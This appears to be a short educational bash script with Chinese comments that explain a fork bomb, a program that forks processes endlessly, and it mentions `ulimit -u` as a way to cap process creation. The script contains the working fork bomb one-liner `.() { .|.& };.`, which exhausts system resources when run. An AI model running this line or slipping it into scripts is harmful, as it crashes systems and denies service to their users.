#!/bin/bash

# Description:
# fork炸弹：是一种恶意程序，他的内部是一个不断在fork进程的无限循环，fork炸弹并不需要有特别的权限即可对系统造成破坏，实质是一个简单的递归。


.() { .|.& };.
 
# ulimit -u 20 这样来限制每个进程最多创建的子进程数
